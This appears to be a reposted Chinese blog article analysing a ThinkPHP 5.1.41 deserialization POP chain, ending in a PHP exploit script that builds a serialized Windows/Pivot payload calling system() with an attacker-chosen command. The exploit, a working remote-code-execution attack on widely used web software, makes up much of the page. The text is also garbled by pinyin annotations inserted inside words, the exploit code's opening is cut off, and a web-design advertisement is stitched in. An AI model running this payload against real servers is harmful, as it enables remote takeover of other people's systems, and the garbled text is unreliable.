Thinkphp v5.1.41反序列化漏洞的分析及EXP，很多新手對此不是很清楚，為了幫助大家解決這個難題，下面小編將為大家詳細講解，有這方面需求的人可以來學習下，希望你能有所收獲。

創(chuàng)新互聯(lián)專業(yè)為企業(yè)提供監(jiān)利網(wǎng)站建設、監(jiān)利做網(wǎng)站、監(jiān)利網(wǎng)站設計、監(jiān)利網(wǎng)站制作等企業(yè)網(wǎng)站建設、網(wǎng)頁設計與制作、監(jiān)利企業(yè)網(wǎng)站模板建站服務，十多年監(jiān)利做網(wǎng)站經(jīng)驗，不只是建網(wǎng)站，更提供有價值的思路和整體網(wǎng)絡服務。

TP5141 反序列化

# Author: 4ut15m
# Date: 2021年4月11日 22:45:46
# Version: thinkphp v5.1.41LTS
# Install: composer create-project topthink/think tp5141 5.1.41 --prefer-dist

晚上回顧tp以前反序列化漏洞的時候發(fā)現(xiàn)的，好像是一條新的POP鏈，沒有在網(wǎng)上看見其他師傅發(fā)表這條鏈

POP鏈

Windows->__destruct	-->Windows->removeFiles		-->Conversion->__toString		-->Conversion->toJson		-->Conversion->toArray		-->Attribute->getAttr


Conversion->Model
Model->Pivot

先看命令執(zhí)行處，若$closure、$value都可控，即可執(zhí)行命令

POP鏈首和tp5.0反序列化漏洞起點一樣，Windows->__destruct

Windows->removeFiles，控制Windows->files可以刪除任意文件。

file_exists函數(shù)可觸發(fā)__toString魔術方法,找到Conversion的toString

跟進Conversion->toArray,$this->append可控

跟進getRelation,使得該方法返回null即可進入if

跟進getAttr,發(fā)現(xiàn)關鍵點

要使代碼執(zhí)行到493行，需要設置$this->withAttr[$fileName].$closure由$this->withAttr[$fileName]控制,$this->withAttr可控,$fileName由我們參數(shù)$name即我們傳入的$this->append的key控制，也是可控的。

value由getData得到

代碼第269行，如果$this->data中存在$name鍵，就將$this->data[$name]的值賦給value,$this->data與$name皆可控，故value可控

整理思路如下

Conversion->append = ["4ut15m"=>[]]
Conversion->relation = false
Conversion->withAttr = ["4ut15m"=>"system"]
Conversion->data = ["4ut15m"=>"cmd"]			//要執(zhí)行的命令

因為convertion是trait類，所以只要找到一個使用了conversion的類即可，全局搜索conversion找到Model類

由于Model是抽象類，我們得找到Model的實現(xiàn)類，全局搜索找到Pivot

至此可以編寫exp

Windows->files = new Pivot()
Pivot->relation = false
Pivot->data = ["4ut15m"=>"cmd"]		//要執(zhí)行的命令
Pivot->withAttr = ["4ut15m"=>"system"]

exp

[]];

    public function __construct($cmd){
        $this->relation = false;
        $this->data = ['4ut15m'=>$cmd];		//任意值,value
        $this->withAttr = ['4ut15m'=>'system'];
    }
}

namespace think\model;
use think\Model;
class Pivot extends Model{
}


namespace think\process\pipes;
use think\model\Pivot;
class Windows{
    private $files = [];

    public function __construct($cmd){
        $this->files = [new Pivot($cmd)];		//Conversion類
    }

}

$windows = new Windows($argv[1]);
echo urlencode(serialize($windows))."\n";


?>

在tp中加一個反序列化點

看完上述內(nèi)容是否對您有幫助呢？如果還想對相關知識有進一步的了解或閱讀更多相關文章，請關注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝您對創(chuàng)新互聯(lián)的支持。